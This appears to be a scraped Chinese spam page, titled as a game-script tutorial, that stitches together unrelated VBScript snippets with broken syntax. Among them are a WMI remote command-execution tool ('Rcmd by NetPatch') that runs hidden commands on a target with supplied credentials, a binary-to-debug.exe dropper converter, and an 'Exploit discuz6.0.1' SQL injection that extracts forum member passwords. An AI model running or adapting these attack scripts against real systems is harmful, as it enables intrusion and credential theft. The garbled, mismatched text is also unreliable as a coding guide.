神途脚本制作教程闻赚钱

发布时间:2021-06-09 来源:脚本之家 点击:

所有的设备名在系统表"sysdevices"里有记录,所有的数据库名在系统表"sysdatabases"里有记录说明:作者对某些代码进行了修改

电脑脚本录制

Function ReadRegValue( myComputer, myRegPath, myRegValue )
' This function reads a value from the registry of any WMI
' enabled computer.
'
' Arguments:
' myComputer a computer name or IP address,
' or a dot for the local computer
' myRegPath a full registry key path, e.g.
' HKEY_CLASSES_ROOT\.jpg or
' HKLM\SOFTWARE\Microsoft\DirectX
' myRegValue the value name to be queried, e.g.
' InstalledVersion or "" for default
' values
'
' The function returns an array with the following elements:
' ReadRegValue(0) the computer name (the first argument)
' ReadRegValue(1) the hive number (see const declarations)
' ReadRegValue(2) the key path without the hive
' ReadRegValue(3) the value name (the third argument)
' ReadRegValue(4) the error number: 0 means no error
' ReadRegValue(5) the data type of the result
' ReadRegValue(6) the actual data, or the first element of an
' array of data for REG_BINARY or REG_MULTI_SZ
'
' Written by Rob van der Woude
'


' Standard housekeeping
Const HKEY_CLASSES_ROOT=&H80000000
Const HKEY_CURRENT_USER=&H80000001
Const HKEY_LOCAL_MACHINE=&H80000002
Const HKEY_USERS=&H80000003
Const HKEY_CURRENT_CONFIG=&H80000005
Const HKEY_DYN_DATA=&H80000006 ' Windows 95/98 only

Const REG_SZ=1
Const REG_EXPAND_SZ=2
Const REG_BINARY=3
Const REG_DWORD=4
Const REG_DWORD_BIG_ENDIAN=5
Const REG_LINK=6
Const REG_MULTI_SZ=7
Const REG_RESOURCE_LIST=8
Const REG_FULL_RESOURCE_DESCRIPTOR=9
Const REG_RESOURCE_REQUIREMENTS_LIST=10
Const REG_QWORD=11

Dim arrRegPath, arrResult(), arrValueNames, arrValueTypes
Dim i, objReg, strHive, valRegError, valRegType, valRegVal

' Assume no error, for now
valRegError=0

' Split the registry path in a hive part
' and the rest, and check if that succeeded
arrRegPath=Split( myRegPath, "", 2 )
If IsArray( arrRegPath ) Then
If UBound( arrRegPath ) <> 1 Then valRegError=5
Else
valRegError=5
End If

' Convert the hive string to a hive number
Select Case UCase( arrRegPath( 0 ) )
Case "HKCR", "HKEY_CLASSES_ROOT"
strHive=HKEY_CLASSES_ROOT
Case "HKCU", "HKEY_CURRENT_USER"
strHive=HKEY_CURRENT_USER
Case "HKLM", "HKEY_LOCAL_MACHINE"
strHive=HKEY_LOCAL_MACHINE
Case "HKU", "HKEY_USERS"
strHive=HKEY_USERS
Case "HKCC", "HKEY_CURRENT_CONFIG"
strHive=HKEY_CURRENT_CONFIG
Case "HKDD", "HKEY_DYN_DATA"
strHive=HKEY_DYN_DATA
Case Else
valRegError=5
End Select

' Abort if any error occurred, and return an error code
If valRegError > 0 Then
ReadRegValue=Array( myComputer, myRegPath, _
myRegPath, myRegValue, _
valRegError, "-", "-" )
Exit Function
End If

' Initiate custom error handling
On Error Resume Next

' Create a WMI registry object
Set objReg=GetObject( "winmgmts:{impersonationLevel=impersonate}!//" _
& myComputer & "/root/default:StdRegProv" )

' Abort on failure to create the object
If Err Then
valRegError=Err.Number
Err.Clear
On Error Goto 0
ReadRegValue=Array( myComputer, myRegPath, _
myRegPath, myRegValue, _
valRegError, "-", "-" )
Exit Function
End If

' Get a list of all values in the registry path;
' we need to do this in order to find out the
' exact data type for the requested value
objReg.EnumValues strHive, arrRegPath( 1 ), arrValueNames, arrValueTypes

' If no values were found, we'll need to retrieve a default value
If Not IsArray( arrValueNames ) Then
arrValueNames=Array( "" )
arrValueTypes=Array( REG_SZ )
End If

If Err Then
' Abort on failure, returning an error code
valRegError=Err.Number
Err.Clear
On Error Goto 0
ReadRegValue=Array( myComputer, myRegPath, _
myRegPath, myRegValue, _
valRegError, "-", "-" )
Exit Function
Else
' Loop through all values in the list . . .
For i=0 To UBound( arrValueNames )
' . . . and find the one requested
If UCase( arrValueNames( i ) )=UCase( myRegValue ) Then
' Read the requested value's data type
valRegType=arrValueTypes( i )
' Based on the data type, use the appropriate query to retrieve the data
Select Case valRegType
Case REG_SZ
objReg.GetStringValue strHive, arrRegPath( 1 ), _
myRegValue, valRegVal
If Err Then valRegError=Err.Number
Case REG_EXPAND_SZ
objReg.GetExpandedStringValue strHive, arrRegPath( 1 ), _
myRegValue, valRegVal
If Err Then valRegError=Err.Number
Case REG_BINARY ' returns an array of bytes
objReg.GetBinaryValue strHive, arrRegPath( 1 ), _
myRegValue, valRegVal
If Err Then valRegError=Err.Number
Case REG_DWORD
objReg.GetDWORDValue strHive, arrRegPath( 1 ), _
myRegValue, valRegVal
If Err Then valRegError=Err.Number
Case REG_MULTI_SZ ' returns an array of strings
objReg.GetMultiStringValue strHive, arrRegPath( 1 ), _
myRegValue, valRegVal
If Err Then valRegError=Err.Number
Case REG_QWORD
objReg.GetQWORDValue strHive, arrRegPath( 1 ), _
myRegValue, valRegVal
If Err Then valRegError=Err.Number
Case Else
valRegError=5
End Select
End If
Next
End If

' Check if an error occurred
If valRegError > 0 Then
valRegType=""
valRegVal=""
Err.Clear
On Error Goto 0
End If

' Return the data in an array
If valRegType=REG_BINARY Or valRegType=REG_MULTI_SZ Then
' First, deal with registry data which is
' returned as array instead of single value
ReDim Preserve arrResult( 6 + UBound( valRegVal ) )
arrResult( 0 )=myComputer
arrResult( 1 )=strHive
arrResult( 2 )=arrRegPath( 1 )
arrResult( 3 )=myRegValue
arrResult( 4 )=valRegError
arrResult( 5 )=valRegType
For i=0 To UBound( valRegVal )
arrResult( 6 + i )=valRegVal( i )
Next
ReadRegValue=arrResult
Else
ReadRegValue=Array( myComputer, strHive, arrRegPath( 1 ), _
myRegValue, valRegError, valRegType, valRegVal )
End If

' Finished
Set objReg=Nothing
On Error Goto 0
End Function


----lpszTitle—目录树上方的标题,用来给用户一些提示信息


Set WshShell=CreateObject("WScript.Shell")
code="让SendKeys可以发送中文"
WshShell.Run "cmd.exe /c echo " & code & "| clip.exe", vbHide
app=WshShell.Run ("notepad")
WScript.Sleep 1000
WshShell.AppActivate app
WshShell.SendKeys "^v{BS}"
Wscript.Quit


主程序设计成如下格式:

PrivateSubRun—Step(bzAsInteger)
SelectCasebz
Case1
Timer—step.Interval=20000′这一步停留的时间
Timer—step.Enabled=True
(本步的教学过程控制程序)
  Case2
  ……
  Case3
  ……
  EndSelect
  Endsub
  PrivateSubTimer—step.Timer()′计时器事件
  StepCount=StepCount+1
  Run—StepStepCount′调用主程序
  EndSub
这样,计时器Timer—Step每触发一次,将使变量StepCount的值增1,在调用过程Run—Step时进入下一步学习,而Timer—Step的触发时间可在上一步的程序中设定,具体的Interval值需要根据实际情况确定


fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,""))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then .write """_>>debug.vbs"+vbcrlf+"@echo +"""
next
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with


PrivateSubForm_Load()
'声明已知字符串的字节数、""所在位置的变量
DimnAsInteger,mAsInteger
'声明字符串变量
DimiAsString,jAsString
j="E:\Music\MyFavourite\001\Spring.mp3"'已知字符串初值
i=""'要查找的指定字符
Forn=1ToLen(j)'这里用了Len函数来计算已知字符串的字节数
m=InStrRev(j,i,-1)'""所在的位置(其中的-1是默认的)
Nextn
'显示最后一个""后面的字符串
Text1.Text=Right(j,Len(j)-m)
EndSub

运行程序,文本框中的是不是明明白白地躺着"Spring.mp3"?试着改一改j变量,得到的结果是不是预期的?->


On Error Resume Next
Set outstreem=Wscript.stdout
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Set objShell=Wscript.CreateObject("Wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&Chr(34)&Wscript.ScriptFullName&Chr(34))
Wscript.Quit
End If
If Wscript.arguments.Count<4 Then
usage()
Wscript.echo "Not enough Parameters."
Wscript.Quit
End If

ip=Wscript.arguments(0)
username=Wscript.arguments(1)
password=Wscript.arguments(2)
CmdStr=Wscript.arguments(3)
EchoStr=Wscript.arguments(4)
foldername="c:\\windows\\temp\"

wsh.echo "Conneting "&ip&" ...."
Set objlocator=CreateObject("wbemscripting.swbemlocator")
Set objswbemservices=objlocator.connectserver(ip,"root/cimv2",username,password)
showerror(err.number)
Set Win_Process=objswbemservices.Get("Win32_ProcessStartup")
Set Hide_Windows=Win_Process.SpawnInstance_
Hide_Windows.ShowWindow=12
Set Rcmd=objswbemservices.Get("Win32_Process")
Set colFiles=objswbemservices.ExecQuery _
("Select * from CIM_Datafile Where Name='"&foldername&"read.vbs'")
If colFiles.Count=0 Then
wsh.echo "Not found read.vbs! Create Now!"
Create_read()
End If


If EchoStr="0" Then
msg=Rcmd.create("cmd /c "&CmdStr,Null,Hide_Windows,intProcessID)
Else
msg=Rcmd.create("cmd /c cscript %windir%\temp\read.vbs """&CmdStr&"""",Null,Hide_Windows,intProcessID)
End If

If msg=0 Then
wsh.echo "Command success..."
Else
showerror(Err.Number)
End If

wsh.echo "Please Wait 3 Second ...."
wsh.sleep(3000)
Set StdOut=Wscript.StdOut
Set oReg=objlocator.connectserver(ip,"root/default",username,password).Get("stdregprov")
oReg.GetMultiStringValue &H80000002,"SOFTWARE\Clients","cmd" ,arrValues
wsh.echo String(79,"*")
wsh.echo cmdstr&Chr(13)&Chr(10)
'wsh.echo arrvalues
For Each strValue In arrValues
StdOut.WriteLine strValue
Next
oReg.DeleteValue &H80000002,"SOFTWARE\Clients","cmd"

Sub Create_read()
RunYN=Rcmd.create("cmd /c echo set ws=WScript.CreateObject(^""WScript.Shell^"")> %windir%\temp\read.vbs"_
&"&&echo str=ws.Exec(^""cmd /c ^""^&wscript.arguments(0)).StdOut.ReadAll:set ws=nothing>> %windir%\temp\read.vbs"_
&"&&echo Set oReg=GetObject(^""winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv^"")>> %windir%\temp\read.vbs"_
&"&&echo oReg.SetMultiStringValue ^&H80000002,^""SOFTWARE\Clients^"",^""cmd^"",Array(str) >> %windir%\temp\read.vbs",Null,Hide_Windows,intProcessID)
If RunYN=0 Then
wsh.echo "read.vbs Created!!!"
Else
showerror(Err.Number)
End If

End Sub

Function showerroronly(errornumber)
If errornumber Then
wsh.echo "Error 0x"&CStr(Hex(Err.Number))&" ."
If Err.Description <> "" Then
wsh.echo "Error Description: "&Err.Description&"."
End If
Wscript.Quit
Else
outstreem.Write "."
End If
End Function


Sub usage()
wsh.echo string(79,"*")
wsh.echo "Rcmd v1.01 by NetPatch"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptfullname&" targetIP username password Command"
wsh.echo "cscript "&wscript.scriptfullname&" targetIP username password Command 0 //No echo"
wsh.echo string(79,"*")&vbcrlf
end Sub
自由幻想器用->


Dim strUrl,strSite,strPath,strUid
showB()
Set Args=Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,passwordfromcdb_memberswhereuid=" & strUid &"*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号